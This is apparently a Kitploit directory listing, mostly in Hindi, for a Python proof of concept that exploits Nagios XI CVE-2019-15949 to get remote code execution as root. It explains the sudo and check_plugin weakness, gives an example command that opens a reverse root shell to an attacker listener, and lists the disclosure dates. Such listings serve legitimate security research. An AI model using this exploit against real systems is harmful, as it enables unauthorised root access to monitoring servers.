Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Nagios-CVE-2019-15949-RCE — a PoC for the Nagios CVE-2019-15949 rce in python | Kitploit
उपकरण/GitHubGitHub/plur1bu5/nagios-cve-2019-15949-rce
Privilege EscalationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingPayload Development
GitHubplur1bu5/nagios-cve-2019-15949-rce

Nagios-CVE-2019-15949-RCE

a PoC for the Nagios CVE-2019-15949 rce in python

रिपॉजिटरी देखें
5 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Nagios-CVE-2019-15949-RCE-Poc

CVE-2019-15949 के लिए एक python PoC

अवलोकन

Nagios XI <= 5.6.5 में एक कमजोरी मौजूद है जो हमलावर को RCE का उपयोग करके रूट विशेषाधिकार प्राप्त करने की अनुमति देती है। इस शोषण के लिए सर्वर तक 'nagios' उपयोगकर्ता के रूप में पहुंच, या CCM के माध्यम से वेब इंटरफ़ेस से प्लगइन प्रबंधित करने की अनुमति के साथ पहुंच आवश्यक है।

विवरण

getprofile.sh स्क्रिप्ट, जो सिस्टम प्रोफ़ाइल (profile.php?cmd=download) डाउनलोड करने से शुरू होती है, पासवर्ड रहित sudo एंट्री के माध्यम से रूट के रूप में निष्पादित होती है; यह स्क्रिप्ट 'check_plugin' निष्पादन योग्य को चलाती है जो nagios उपयोगकर्ता के स्वामित्व में है। Nagios XI में प्लगइन संशोधित करने की अनुमति वाला उपयोगकर्ता, या सर्वर पर 'nagios' उपयोगकर्ता, 'check_plugin' निष्पादन योग्य को संशोधित कर सकता है और रूट के रूप में निष्पादित होने वाले दुर्भावनापूर्ण कमांड डाल सकता है।

POC

एक PHP POC विकसित किया गया है जो एक पेलोड अपलोड करता है जिसके परिणामस्वरूप रिवर्स रूट शैल प्राप्त होती है। उपयोग:

python3 exploit.py tagetIp [ssl=false/true] username password Lhost lport

उदाहरण:

python3 exploit.py 10.10.11.9 false nagiosadmin admin 10.10.11.14 4444

प्रकटीकरण

Nagios को रिपोर्ट किया गया: 29th July 2019 Nagios द्वारा पुष्टि की गई: 29th July 2019 संस्करण 5.6.6 में तय किया गया: 20th August 2019 CVE असाइन किया गया: 6th September 2019 (CVE-2019-15949 https://nvd.nist.gov/vuln/detail/CVE-2019-15949)

टूल डाउनलोड करें